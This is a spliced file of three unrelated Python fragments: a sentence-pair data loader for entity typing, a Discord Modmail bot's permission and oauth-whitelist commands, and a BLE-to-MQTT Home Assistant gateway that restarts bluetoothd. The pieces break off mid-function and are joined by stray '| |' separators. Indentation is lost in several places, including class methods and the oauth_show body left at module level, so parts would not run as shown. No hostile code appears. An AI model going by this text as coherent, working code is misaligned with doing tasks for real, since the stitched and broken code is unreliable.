            mention_sent1 = ' '.join(mention_seq_sent1)
            context_sent1 = ' '.join(left_seq_sent1 + mention_seq_sent1 + right_seq_sent1)
            len_after_tokenization1 = len(tokenizer.encode_plus(mention_sent1, context_sent1)['input_ids'])
            if len_after_tokenization1 > max_len:
                # Overflow is measured in wordpieces but trimmed in words;
                # batch_encode_plus truncates any remainder below.
                overflow_len1 = len_after_tokenization1 - max_len
                context_sent1 = ' '.join(left_seq_sent1 + mention_seq_sent1 + right_seq_sent1[:-overflow_len1])
            inputs_sent1.append([mention_sent1, context_sent1])
            sentence_len_wp_sent1.append(len_after_tokenization1)
            # sent2: same treatment as sent1.
            left_seq_sent2 = cur_stream[i][4]
            right_seq_sent2 = cur_stream[i][5]
            mention_seq_sent2 = cur_stream[i][6]
            if len(mention_seq_sent2) > mention_length_limit:
                mention_seq_sent2 = mention_seq_sent2[:mention_length_limit]
            mention_sent2 = ' '.join(mention_seq_sent2)
            context_sent2 = ' '.join(left_seq_sent2 + mention_seq_sent2 + right_seq_sent2)
            len_after_tokenization2 = len(tokenizer.encode_plus(mention_sent2, context_sent2)['input_ids'])
            if len_after_tokenization2 > max_len:
                overflow_len2 = len_after_tokenization2 - max_len
                context_sent2 = ' '.join(left_seq_sent2 + mention_seq_sent2 + right_seq_sent2[:-overflow_len2])
            inputs_sent2.append([mention_sent2, context_sent2])
            sentence_len_wp_sent2.append(len_after_tokenization2)
            # label
            targets[i] = cur_stream[i][7]
        # Batch-encode both sentence lists, padding to the longest pair in the batch.
        max_len_in_batch_sent1 = max(sentence_len_wp_sent1)
        inputs_sent1 = tokenizer.batch_encode_plus(
            inputs_sent1,
            add_special_tokens=True,
            max_length=min(max_len, max_len_in_batch_sent1),
            truncation_strategy='only_second',
            pad_to_max_length=True,
            return_tensors='pt'
        )
        max_len_in_batch_sent2 = max(sentence_len_wp_sent2)
        inputs_sent2 = tokenizer.batch_encode_plus(
            inputs_sent2,
            add_special_tokens=True,
            max_length=min(max_len, max_len_in_batch_sent2),
            truncation_strategy='only_second',
            pad_to_max_length=True,
            return_tensors='pt'
        )
        feed_dict = {
            "ex_ids": ex_ids,
            "inputs":
                {
                    "sent1": inputs_sent1,
                    "sent2": inputs_sent2
                },
            "targets": torch.from_numpy(targets)
        }
        if no_more_data:
            # Partial final batch is only emitted for evaluation data.
            if eval_data and bsz > 0:
                yield feed_dict
            break
        yield feed_dict
class DatasetLoaderTypeReductionLR(object):
    """Loads labelled (sent1, sent2) pair data for type-reduction LR training.

    Wraps a list of json-like dicts (``data``) and produces batches via
    ``get_type_reduction_LR_example``.
    """

    def __init__(self, data, args, tokenizer):
        """Store the dataset and tokenizer; resolve the answer vocabulary.

        Raises:
            ValueError: If ``args.goal`` is neither '60k' nor 'ufet'.
        """
        self.data = data
        if args.goal == '60k':
            self.word2id = transformer_constant.ANS2ID_DICT_60K
        elif args.goal == 'ufet':
            self.word2id = transformer_constant.ANS2ID_DICT_UFET
        else:
            # BUG FIX: the original printed and then used a bare `raise`,
            # which itself fails with "No active exception to re-raise";
            # raise a real, descriptive exception instead.
            raise ValueError('ERROR: Invalid input... ' + args.goal)
        self.tokenizer = tokenizer
        self.do_lower = args.do_lower
        self.context_window_size = args.context_window_size
        self.args = args

    def _load_npz(self, path):
        """Load a NumPy array from ``path``.

        NOTE(review): for ``.npz`` archives the lazily-loaded result would be
        returned after the underlying file is closed — assumed ``.npy`` only.
        """
        with open(path, 'rb') as f:
            data = np.load(f)
        return data

    def _load_shard(self):
        """Return a zipped stream of
        (ex_id, left1, right1, mention1, left2, right2, mention2, label)
        tuples, lower-cased when ``do_lower`` and clipped to
        ``context_window_size`` context words on each side."""
        lines = self.data
        ex_ids = list(range(len(lines)))
        mention_word_sent1 = [line['sent1']["word"].split() if not self.do_lower
                              else line['sent1']["word"].lower().split() for line in lines]
        left_seq_sent1 = [line['sent1']['left_context'][-self.context_window_size:] if not self.do_lower
                          else [w.lower() for w in line['sent1']['left_context']][-self.context_window_size:]
                          for line in lines]
        right_seq_sent1 = [line['sent1']['right_context'][:self.context_window_size] if not self.do_lower
                           else [w.lower() for w in line['sent1']['right_context']][:self.context_window_size]
                           for line in lines]
        mention_word_sent2 = [line['sent2']["word"].split() if not self.do_lower
                              else line['sent2']["word"].lower().split() for line in lines]
        left_seq_sent2 = [line['sent2']['left_context'][-self.context_window_size:] if not self.do_lower
                          else [w.lower() for w in line['sent2']['left_context']][-self.context_window_size:]
                          for line in lines]
        right_seq_sent2 = [line['sent2']['right_context'][:self.context_window_size] if not self.do_lower
                           else [w.lower() for w in line['sent2']['right_context']][:self.context_window_size]
                           for line in lines]
        labels = [int(line['label']) for line in lines]
        # (Dead `if False:` debug-print block removed.)
        return zip(ex_ids, left_seq_sent1, right_seq_sent1, mention_word_sent1,
                   left_seq_sent2, right_seq_sent2, mention_word_sent2, labels)

    def _get_sentence(self, epoch):
        """Yield every example tuple from the shard, repeated ``epoch`` times."""
        for _ in range(epoch):
            for current_ids in self._load_shard():
                yield current_ids

    def get_batch(self, batch_size, max_len, epoch, eval_data=True):
        """Return the batch generator for this dataset."""
        return get_type_reduction_LR_example(
            self._get_sentence(epoch), batch_size=batch_size, max_len=max_len,
            eval_data=eval_data, tokenizer=self.tokenizer
        )
def get_type_reduction_BL4NED_example(generator, batch_size, max_len,
                                      eval_data=False, tokenizer=None):
    """Yield batches of tokenized (sent1, sent2) mention/context pairs for
    the BL4NED variant.

    Args:
        generator: Iterator of per-example tuples
            (ex_id, left1, right1, mention1, left2, right2, mention2, label),
            where contexts and mentions are lists of words.
        batch_size: Number of examples per batch.
        max_len: Maximum wordpiece length for a tokenized pair.
        eval_data: If True, the final partial batch is also yielded.
        tokenizer: HuggingFace-style tokenizer providing ``encode_plus`` and
            ``batch_encode_plus``.

    Yields:
        dict: ``{"ex_ids": object ndarray, "inputs": {"sent1": ..., "sent2": ...},
        "targets": float32 torch tensor of labels}``.
    """
    # [cur_stream elements]
    # 0: example id, 1: left context_pos1, 2: right context_pos1, 3: mention word_pos1,
    # 4: left context_pos2, 5: right context_pos2, 6: mention word_pos2,
    # 7: labels
    cur_stream = [None] * batch_size
    no_more_data = False
    mention_length_limit = 10  # in words, not word pieces
    while True:
        bsz = batch_size
        for i in range(batch_size):
            try:
                cur_stream[i] = list(next(generator))
            except StopIteration:
                no_more_data = True
                bsz = i
                break
        if no_more_data and bsz == 0:
            break
        # BUG FIX: `np.object` was removed in NumPy 1.24; the builtin `object`
        # is the supported spelling of the same dtype.
        ex_ids = np.zeros([bsz], dtype=object)
        targets = np.zeros([bsz], np.float32)
        inputs_sent1 = []
        inputs_sent2 = []
        sentence_len_wp_sent1 = []
        sentence_len_wp_sent2 = []
        for i in range(bsz):
            ex_ids[i] = cur_stream[i][0]
            # sent1: clip over-long mentions, then trim right-context words
            # until the tokenized pair fits within max_len.
            left_seq_sent1 = cur_stream[i][1]
            right_seq_sent1 = cur_stream[i][2]
            mention_seq_sent1 = cur_stream[i][3]
            if len(mention_seq_sent1) > mention_length_limit:
                mention_seq_sent1 = mention_seq_sent1[:mention_length_limit]
            mention_sent1 = ' '.join(mention_seq_sent1)
            context_sent1 = ' '.join(left_seq_sent1 + mention_seq_sent1 + right_seq_sent1)
            len_after_tokenization1 = len(tokenizer.encode_plus(mention_sent1, context_sent1)['input_ids'])
            if len_after_tokenization1 > max_len:
                # Overflow is measured in wordpieces but trimmed in words;
                # batch_encode_plus truncates any remainder below.
                overflow_len1 = len_after_tokenization1 - max_len
                context_sent1 = ' '.join(left_seq_sent1 + mention_seq_sent1 + right_seq_sent1[:-overflow_len1])
            inputs_sent1.append([mention_sent1, context_sent1])
            sentence_len_wp_sent1.append(len_after_tokenization1)
            # sent2: same treatment as sent1.
            left_seq_sent2 = cur_stream[i][4]
            right_seq_sent2 = cur_stream[i][5]
            mention_seq_sent2 = cur_stream[i][6]
            if len(mention_seq_sent2) > mention_length_limit:
                mention_seq_sent2 = mention_seq_sent2[:mention_length_limit]
            mention_sent2 = ' '.join(mention_seq_sent2)
            context_sent2 = ' '.join(left_seq_sent2 + mention_seq_sent2 + right_seq_sent2)
            len_after_tokenization2 = len(tokenizer.encode_plus(mention_sent2, context_sent2)['input_ids'])
            if len_after_tokenization2 > max_len:
                overflow_len2 = len_after_tokenization2 - max_len
                context_sent2 = ' '.join(left_seq_sent2 + mention_seq_sent2 + right_seq_sent2[:-overflow_len2])
            inputs_sent2.append([mention_sent2, context_sent2])
            sentence_len_wp_sent2.append(len_after_tokenization2)
            # label
            targets[i] = cur_stream[i][7]
        # Batch-encode both sentence lists, padding to the longest pair in the batch.
        max_len_in_batch_sent1 = max(sentence_len_wp_sent1)
        inputs_sent1 = tokenizer.batch_encode_plus(
            inputs_sent1,
            add_special_tokens=True,
            max_length=min(max_len, max_len_in_batch_sent1),
            truncation_strategy='only_second',
            pad_to_max_length=True,
            return_tensors='pt'
        )
        max_len_in_batch_sent2 = max(sentence_len_wp_sent2)
        inputs_sent2 = tokenizer.batch_encode_plus(
            inputs_sent2,
            add_special_tokens=True,
            max_length=min(max_len, max_len_in_batch_sent2),
            truncation_strategy='only_second',
            pad_to_max_length=True,
            return_tensors='pt'
        )
        feed_dict = {
            "ex_ids": ex_ids,
            "inputs":
                {
                    "sent1": inputs_sent1,
                    "sent2": inputs_sent2
                },
            "targets": torch.from_numpy(targets)
        }
        if no_more_data:
            # Partial final batch is only emitted for evaluation data.
            if eval_data and bsz > 0:
                yield feed_dict
            break
        yield feed_dict
class DatasetLoaderTypeReductionBL4NED(object):
def __init__(self, data, args, tokenizer):
    """Store the dataset and tokenizer; resolve the answer vocabulary.

    Args:
        data: List of json-like example dicts.
        args: Namespace with ``goal``, ``do_lower`` and ``context_window_size``.
        tokenizer: HuggingFace-style tokenizer.

    Raises:
        ValueError: If ``args.goal`` is neither '60k' nor 'ufet'.
    """
    self.data = data
    if args.goal == '60k':
        self.word2id = transformer_constant.ANS2ID_DICT_60K
    elif args.goal == 'ufet':
        self.word2id = transformer_constant.ANS2ID_DICT_UFET
    else:
        # BUG FIX: the original printed and then used a bare `raise`, which
        # itself fails with "No active exception to re-raise"; raise a real,
        # descriptive exception instead.
        raise ValueError('ERROR: Invalid input... ' + args.goal)
    self.tokenizer = tokenizer
    self.do_lower = args.do_lower
    self.context_window_size = args.context_window_size
    self.args = args
def _load_npz(self, path):
    """Load a NumPy array from ``path``.

    NOTE(review): ``np.load`` runs inside the ``with`` block but the result
    is returned after the file is closed; ``.npz`` archives are lazily
    loaded and would be unusable after close — presumably this is only used
    for eagerly-loaded ``.npy`` files. Confirm.
    """
    with open(path, 'rb') as f:
        data = np.load(f)
    return data
def _load_shard(self):
lines = self.data # jsonlines
ex_ids = list(range(len(lines)))
mention_word_sent1 = [line['sent1']["word"].split() if not self.do_lower
else line['sent1']["word"].lower().split() for line in lines]
left_seq_sent1 = [line['sent1']['left_context'][-self.context_window_size:] if not self.do_lower
else [w.lower() for w in line['sent1']['left_context']][-self.context_window_size:] for line in lines]
right_seq_sent1 = [line['sent1']['right_context'][:self.context_window_size] if not self.do_lower
else [w.lower() for w in line['sent1']['right_context']][:self.context_window_size] for line in lines]
mention_word_sent2 | |
Modmail supporting functions)
- **Regular** [1] (most basic interactions such as help and about)
By default, owner is set to the absolute bot owner and regular is `@everyone`.
Note: You will still have to manually give/take permission to the Modmail
category to users/roles.
"""
await ctx.send_help(ctx.command)
@permissions.group(name="add", invoke_without_command=True)
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_add(self, ctx):
    """Add a permission to a command or a permission level."""
    # Invoked without a subcommand: just show the help for this group.
    await ctx.send_help(ctx.command)
@permissions_add.command(name="command")
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_add_command(
    self, ctx, command: str, *, user_or_role: Union[User, Role, str]
):
    """
    Add a user, role, or everyone permission to use a command.
    Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
    `user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
    """
    # Unknown command name: reply with an error embed, nothing is persisted.
    if command not in self.bot.all_commands:
        embed = Embed(
            title="Error",
            color=Color.red(),
            description="The command you are attempting to point "
            f"to does not exist: `{command}`.",
        )
        return await ctx.send(embed=embed)
    # Users/Roles carry an id; the literal strings "everyone"/"all" map to -1.
    if hasattr(user_or_role, "id"):
        value = user_or_role.id
    elif user_or_role in {"everyone", "all"}:
        value = -1
    else:
        raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
    # Persist under the command object's `.name` (presumably the canonical
    # name rather than a typed alias — confirm against all_commands contents).
    await self.bot.update_perms(self.bot.all_commands[command].name, value)
    embed = Embed(
        title="Success",
        color=self.bot.main_color,
        description=f"Permission for {command} was successfully updated.",
    )
    return await ctx.send(embed=embed)
@permissions_add.command(name="level", aliases=["group"])
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_add_level(
    self, ctx, level: str, *, user_or_role: Union[User, Role, str]
):
    """
    Add a user, role, or everyone permission to use commands of a permission level.
    Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
    `user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
    """
    # Levels are matched case-insensitively against the enum member names.
    level_key = level.upper()
    if level_key not in PermissionLevel.__members__:
        error_embed = Embed(
            title="Error",
            color=Color.red(),
            description="The permission level you are attempting to point "
            f"to does not exist: `{level}`.",
        )
        return await ctx.send(embed=error_embed)
    # Translate the target into the stored permission value: a Discord ID,
    # or -1 meaning "everyone".
    value = getattr(user_or_role, "id", None)
    if value is None:
        if user_or_role not in {"everyone", "all"}:
            raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
        value = -1
    await self.bot.update_perms(PermissionLevel[level_key], value)
    success_embed = Embed(
        title="Success",
        color=self.bot.main_color,
        description=f"Permission for {level} was successfully updated.",
    )
    return await ctx.send(embed=success_embed)
@permissions.group(
    name="remove",
    aliases=["del", "delete", "rm", "revoke"],
    invoke_without_command=True,
)
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_remove(self, ctx):
    """Remove permission to use a command or permission level."""
    # Group root carries no behavior of its own: show the subcommand help.
    await ctx.send_help(ctx.command)
@permissions_remove.command(name="command")
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_remove_command(
    self, ctx, command: str, *, user_or_role: Union[User, Role, str]
):
    """
    Remove a user, role, or everyone permission to use a command.
    Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
    `user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
    """
    # Reject unknown command names up front with an error embed.
    resolved = self.bot.all_commands.get(command)
    if resolved is None:
        error_embed = Embed(
            title="Error",
            color=Color.red(),
            description="The command you are attempting to point "
            f"to does not exist: `{command}`.",
        )
        return await ctx.send(embed=error_embed)
    # Translate the target into the stored permission value: a Discord ID,
    # or -1 meaning "everyone".
    value = getattr(user_or_role, "id", None)
    if value is None:
        if user_or_role not in {"everyone", "all"}:
            raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
        value = -1
    # add=False deletes the entry instead of adding it.
    await self.bot.update_perms(resolved.name, value, add=False)
    success_embed = Embed(
        title="Success",
        color=self.bot.main_color,
        description=f"Permission for {command} was successfully updated.",
    )
    return await ctx.send(embed=success_embed)
@permissions_remove.command(name="level", aliases=["group"])
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_remove_level(
    self, ctx, level: str, *, user_or_role: Union[User, Role, str]
):
    """
    Remove a user, role, or everyone permission to use commands of a permission level.
    Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
    `user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
    """
    # Levels are matched case-insensitively against the enum member names.
    level_key = level.upper()
    if level_key not in PermissionLevel.__members__:
        error_embed = Embed(
            title="Error",
            color=Color.red(),
            description="The permission level you are attempting to point "
            f"to does not exist: `{level}`.",
        )
        return await ctx.send(embed=error_embed)
    # Translate the target into the stored permission value: a Discord ID,
    # or -1 meaning "everyone".
    value = getattr(user_or_role, "id", None)
    if value is None:
        if user_or_role not in {"everyone", "all"}:
            raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
        value = -1
    # add=False deletes the entry instead of adding it.
    await self.bot.update_perms(PermissionLevel[level_key], value, add=False)
    success_embed = Embed(
        title="Success",
        color=self.bot.main_color,
        description=f"Permission for {level} was successfully updated.",
    )
    return await ctx.send(embed=success_embed)
@permissions.group(name="get", invoke_without_command=True)
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_get(self, ctx, *, user_or_role: Union[User, Role, str]):
    """
    View the currently-set permissions.
    You can specify `user_or_role` as an alternative to get-by-command or get-by-level.
    Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
    `user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
    """
    # Translate the target into the stored permission value: a Discord ID,
    # or -1 meaning "everyone".
    value = getattr(user_or_role, "id", None)
    if value is None:
        if user_or_role not in {"everyone", "all"}:
            raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
        value = -1
    # Collect every command and permission level whose entry list contains
    # this value.
    cmds = [
        cmd.name
        for cmd in self.bot.commands
        if value in self.bot.config.command_permissions.get(cmd.name, [])
    ]
    levels = [
        perm_level.name
        for perm_level in PermissionLevel
        if value in self.bot.config.level_permissions.get(perm_level.name, [])
    ]
    mention = getattr(user_or_role, "name", user_or_role)
    desc_cmd = (
        ", ".join(f"`{name}`" for name in cmds)
        if cmds
        else "No permission entries found."
    )
    desc_level = (
        ", ".join(f"`{name}`" for name in levels)
        if levels
        else "No permission entries found."
    )
    embeds = [
        Embed(
            title=f"{mention} has permission with the following commands:",
            description=desc_cmd,
            color=self.bot.main_color,
        ),
        Embed(
            title=f"{mention} has permission with the following permission groups:",
            description=desc_level,
            color=self.bot.main_color,
        ),
    ]
    return await PaginatorSession(ctx, *embeds).run()
@permissions_get.command(name="command")
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_get_command(self, ctx, *, command: str = None):
    """View currently-set permissions for a command."""

    def get_command(cmd):
        # Build one embed listing every permission entry stored for `cmd`.
        permissions = self.bot.config.command_permissions.get(cmd.name, [])
        if not permissions:
            embed = Embed(
                title=f"Permission entries for command `{cmd.name}`:",
                description="No permission entries found.",
                color=self.bot.main_color,
            )
        else:
            values = []
            for perm in permissions:
                # -1 is the "everyone" sentinel; keep it at the front.
                if perm == -1:
                    values.insert(0, "**everyone**")
                    continue
                # Resolve the stored ID: guild member, then global user,
                # then guild role; fall back to showing the raw ID.
                member = ctx.guild.get_member(perm)
                if member is not None:
                    values.append(member.mention)
                    continue
                user = self.bot.get_user(perm)
                if user is not None:
                    values.append(user.mention)
                    continue
                role = ctx.guild.get_role(perm)
                if role is not None:
                    values.append(role.mention)
                else:
                    values.append(str(perm))
            embed = Embed(
                title=f"Permission entries for command `{cmd.name}`:",
                description=", ".join(values),
                color=self.bot.main_color,
            )
        return embed

    embeds = []
    if command is not None:
        # A specific command was requested: validate it exists first.
        if command not in self.bot.all_commands:
            embed = Embed(
                title="Error",
                color=Color.red(),
                description="The command you are attempting to point "
                f"to does not exist: `{command}`.",
            )
            return await ctx.send(embed=embed)
        embeds.append(get_command(self.bot.all_commands[command]))
    else:
        # No argument: one page per registered command.
        for cmd in self.bot.commands:
            embeds.append(get_command(cmd))
    p_session = PaginatorSession(ctx, *embeds)
    return await p_session.run()
@permissions_get.command(name="level", aliases=["group"])
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_get_level(self, ctx, *, level: str = None):
    """View currently-set permissions for commands of a permission level."""

    def get_level(perm_level):
        # Build one embed listing every permission entry stored for the level.
        permissions = self.bot.config.level_permissions.get(perm_level.name, [])
        if not permissions:
            embed = Embed(
                title="Permission entries for permission "
                f"level `{perm_level.name}`:",
                description="No permission entries found.",
                color=self.bot.main_color,
            )
        else:
            values = []
            for perm in permissions:
                # -1 is the "everyone" sentinel; keep it at the front.
                if perm == -1:
                    values.insert(0, "**everyone**")
                    continue
                # Resolve the stored ID: guild member, then global user,
                # then guild role; fall back to showing the raw ID.
                member = ctx.guild.get_member(perm)
                if member is not None:
                    values.append(member.mention)
                    continue
                user = self.bot.get_user(perm)
                if user is not None:
                    values.append(user.mention)
                    continue
                role = ctx.guild.get_role(perm)
                if role is not None:
                    values.append(role.mention)
                else:
                    values.append(str(perm))
            embed = Embed(
                title=f"Permission entries for permission level `{perm_level.name}`:",
                description=", ".join(values),
                color=self.bot.main_color,
            )
        return embed

    embeds = []
    if level is not None:
        # A specific level was requested: validate it (case-insensitively).
        if level.upper() not in PermissionLevel.__members__:
            embed = Embed(
                title="Error",
                color=Color.red(),
                description="The permission level you are attempting to point "
                f"to does not exist: `{level}`.",
            )
            return await ctx.send(embed=embed)
        embeds.append(get_level(PermissionLevel[level.upper()]))
    else:
        # No argument: one page per permission level.
        for perm_level in PermissionLevel:
            embeds.append(get_level(perm_level))
    p_session = PaginatorSession(ctx, *embeds)
    return await p_session.run()
@commands.group(invoke_without_command=True)
@checks.has_permissions(PermissionLevel.OWNER)
async def oauth(self, ctx):
    """Commands relating to Logviewer oauth2 login authentication.
    This functionality on your logviewer site is a [**Patron**](https://patreon.com/kyber) only feature.
    """
    # Group root carries no behavior of its own: show the subcommand help.
    await ctx.send_help(ctx.command)
@oauth.command(name="whitelist")
@checks.has_permissions(PermissionLevel.OWNER)
async def oauth_whitelist(self, ctx, target: Union[User, Role]):
    """
    Whitelist or un-whitelist a user or role to have access to logs.
    `target` may be a role ID, name, mention, user ID, name, or mention.
    """
    # Toggle membership: drop the ID when present, add it otherwise.
    whitelisted = self.bot.config["oauth_whitelist"]
    removed = target.id in whitelisted
    if removed:
        whitelisted.remove(target.id)
    else:
        whitelisted.append(target.id)
    await self.bot.config.update()
    embed = Embed(color=self.bot.main_color)
    embed.title = "Success"
    # Defensive: re-resolve the target if the converter ever yields an
    # object without a `mention` attribute.
    if not hasattr(target, "mention"):
        target = self.bot.get_user(target.id) or self.bot.modmail_guild.get_role(
            target.id
        )
    embed.description = (
        f"{'Un-w' if removed else 'W'}hitelisted {target.mention} to view logs."
    )
    await ctx.send(embed=embed)
@oauth.command(name="show", aliases=["get", "list", "view"])
@checks.has_permissions(PermissionLevel.OWNER)
async def oauth_show(self, ctx):
"""Shows a list of users and roles that are whitelisted to view logs."""
whitelisted = self.bot.config["oauth_whitelist"]
users = []
roles = []
for id_ in whitelisted:
user = self.bot.get_user(id_)
if user:
users.append(user)
role = self.bot.modmail_guild.get_role(id_)
if role:
roles.append(role)
embed = Embed(color=self.bot.main_color)
embed.title = "Oauth Whitelist"
embed.add_field(
name="Users", value=" ".join(u.mention for u in users) or "None"
)
embed.add_field(
name="Roles", value=" ".join(r.mention for r in roles) or | |
# <gh_stars>0
import asyncio as aio
import json
import logging
import typing as ty
from contextlib import asynccontextmanager
from uuid import getnode
import aio_mqtt
from bleak import BleakError, BleakScanner
from bleak.backends.device import BLEDevice
from .devices.base import (BINARY_SENSOR_DOMAIN, LIGHT_DOMAIN, SENSOR_DOMAIN,
SWITCH_DOMAIN, ConnectionTimeoutError, Device,
done_callback)
logger = logging.getLogger(__name__)

# MQTT discovery prefix consumed by Home Assistant.
CONFIG_MQTT_NAMESPACE = 'homeassistant'
# Subtopic under which entity state payloads are published.
SENSOR_STATE_TOPIC = 'state'
# NOTE(review): not referenced in this chunk — verify it is used elsewhere.
BLUETOOTH_ERROR_RECONNECTION_TIMEOUT = 60
# Consecutive generic connection failures tolerated before bluetoothd is
# restarted (see DeviceManager.manage_device).
FAILURE_LIMIT = 5

# Exceptions treated as recoverable BLE connection problems.
ListOfConnectionErrors = (
    BleakError,
    aio.TimeoutError,
    # dbus-next exceptions:
    # AttributeError: 'NoneType' object has no attribute 'call'
    AttributeError,
    # https://github.com/hbldh/bleak/issues/409
    EOFError,
)

# Held while bluetoothd is being restarted; device loops also take it
# briefly to wait out an in-progress restart.
BLUETOOTH_RESTARTING = aio.Lock()
async def run_tasks_and_cancel_on_first_return(*tasks: aio.Future,
                                               return_when=aio.FIRST_COMPLETED,
                                               ignore_futures=(),
                                               ) -> ty.Sequence[aio.Future]:
    """Wait until *return_when* is satisfied, cancel the rest, and return
    the futures that completed (done ones plus any pending that finished
    or raised during cancellation). Futures in *ignore_futures* are never
    cancelled."""

    async def cancel_tasks(_tasks) -> ty.List[aio.Task]:
        # cancel first, then await. Because other tasks can raise exceptions
        # while switching tasks
        canceled = []
        for t in _tasks:
            if t in ignore_futures:
                continue
            if not t.done():
                t.cancel()
                canceled.append(t)
        tasks_raise_exceptions = []
        for t in canceled:
            try:
                await t
            except aio.CancelledError:
                pass
            except Exception:
                logger.exception(
                    f'Unexpected exception while cancelling tasks! {t}',
                )
                tasks_raise_exceptions.append(t)
        return tasks_raise_exceptions

    assert all(isinstance(t, aio.Future) for t in tasks)
    try:
        # NB: pending tasks can still raise exception or finish
        # while tasks are switching
        done, pending = await aio.wait(tasks, return_when=return_when)
    except aio.CancelledError:
        await cancel_tasks(tasks)
        # it could happen that tasks raised exception and canceling wait task
        # abandons tasks with exception
        for t in tasks:
            if not t.done() or t.cancelled():
                continue
            try:
                t.result()
                # no CancelledError expected
            except Exception:
                logger.exception(
                    f'Task raises exception while cancelling parent coroutine '
                    f'that waits for it {t}')
        raise
    # while switching tasks for await other pending tasks can raise an exception
    # we need to append more tasks to the result if so
    await cancel_tasks(pending)
    task_remains = [t for t in pending if not t.cancelled()]
    return [*done, *task_remains]
async def handle_returned_tasks(*tasks: aio.Future):
    """Collect results of already-finished tasks.

    All failing tasks are logged except one, whose exception is re-raised;
    when nothing failed, the results of the successful tasks are returned
    (order unspecified).
    """
    failed = [t for t in tasks if t.done() and t.exception()]
    succeeded = set(tasks) - set(failed)
    if failed:
        # Keep one failure to propagate; log the others so they are not lost.
        to_propagate = failed.pop()
        for task in failed:
            try:
                await task
            except aio.CancelledError:
                raise
            except Exception:
                logger.exception('Task raised an error')
        await to_propagate
    return [await task for task in succeeded]
def hardware_exception_occurred(exception):
    """Return True when the error text indicates the DBus/bluez stack is
    wedged and a bluetoothd restart is warranted."""
    markers = (
        'org.freedesktop.DBus.Error.ServiceUnknown',
        'org.freedesktop.DBus.Error.NoReply',
        'org.freedesktop.DBus.Error.AccessDenied',
        'org.bluez.Error.Failed: Connection aborted',
        'org.bluez.Error.NotReady',
        'org.bluez.Error.InProgress',
    )
    text = str(exception)
    return any(marker in text for marker in markers)
# Exceptions indicating the MQTT connection dropped and a reconnect is needed.
ListOfMQTTConnectionErrors = (
    aio_mqtt.ConnectionLostError,
    aio_mqtt.ConnectionClosedError,
    aio_mqtt.ServerDiedError,
    BrokenPipeError,
)
async def restart_bluetooth():
    """Bounce the bluetooth stack: hci0 down, restart bluetoothd, hci0 up.

    If a restart is already running, just sleep roughly as long as one
    takes and return instead of queueing a second restart.
    """
    if BLUETOOTH_RESTARTING.locked():
        await aio.sleep(9)
        return
    async with BLUETOOTH_RESTARTING:
        logger.warning('Restarting bluetoothd...')
        proc = await aio.create_subprocess_exec(
            'hciconfig', 'hci0', 'down',
        )
        await proc.wait()
        # NOTE(review): assumes an init-script at this exact path (typical
        # for OpenWrt-style systems) — confirm on the target platform.
        proc = await aio.create_subprocess_exec(
            '/etc/init.d/bluetoothd', 'restart',
        )
        await proc.wait()
        await aio.sleep(3)
        proc = await aio.create_subprocess_exec(
            'hciconfig', 'hci0', 'up',
        )
        await proc.wait()
        await aio.sleep(5)
        logger.warning('Restarting bluetoothd finished')
@asynccontextmanager
async def handle_ble_exceptions():
    """Pass BLE connection errors through, but when the error text shows the
    adapter/DBus stack is wedged, restart bluetoothd before re-raising."""
    try:
        yield
    except ListOfConnectionErrors as e:
        if hardware_exception_occurred(e):
            await restart_bluetooth()
            await aio.sleep(3)
        raise
class DeviceManager:
    """Owns a single BLE device: publishes its Home Assistant discovery
    config, relays its state to MQTT, and drives its reconnect loop."""

    def __init__(self, device, mqtt_client, base_topic):
        self.device: Device = device
        self._mqtt_client = mqtt_client
        self._base_topic = base_topic
        # Task running manage_device(); created by run_task().
        self.manage_task = None

    async def close(self):
        """Cancel the manage loop (if running) and close the device."""
        if self.manage_task and not self.manage_task.done():
            self.manage_task.cancel()
            try:
                await self.manage_task
            except aio.CancelledError:
                pass
        self.manage_task = None
        try:
            await self.device.close()
        except aio.CancelledError:
            raise
        except Exception:
            logger.exception(f'Problem on closing device {self.device}')

    def run_task(self) -> aio.Task:
        """Spawn the manage loop; at most one task per manager may exist."""
        assert not self.manage_task, \
            f'{self.device} Previous task was not finished! {self.manage_task}'
        self.manage_task = aio.create_task(self.manage_device())
        return self.manage_task

    async def publish_topic_callback(self, topic, value):
        # Handed to the device so it can publish its own state updates
        # under "<base_topic>/<topic>".
        logger.debug(f'call publish callback topic={topic} value={value}')
        await self._mqtt_client.publish(
            aio_mqtt.PublishableMessage(
                topic_name='/'.join((self._base_topic, topic)),
                payload=value,
                qos=aio_mqtt.QOSLevel.QOS_1,
            ),
        )

    def _get_topic(self, dev_id, subtopic, *args):
        # "<base_topic>/<dev_id>/<subtopic>[/...]"
        return '/'.join((self._base_topic, dev_id, subtopic, *args))

    async def send_device_config(self):
        """Publish retained MQTT-discovery config messages for every entity
        the device exposes (binary sensors, sensors, switches, lights)."""
        device = self.device
        device_info = {
            'identifiers': [
                device.unique_id,
            ],
            'name': device.unique_name,
            'model': device.model,
        }
        if device.manufacturer:
            device_info['manufacturer'] = device.manufacturer
        if device.version:
            device_info['sw_version'] = device.version

        def get_generic_vals(entity: dict):
            # Common discovery-payload fields. Pops the keys consumed here
            # (name/icon/topic/json/main_value) and forwards any remaining
            # entity keys straight into the payload.
            name = entity.pop('name')
            result = {
                'name': f'{name}_{device.dev_id}',
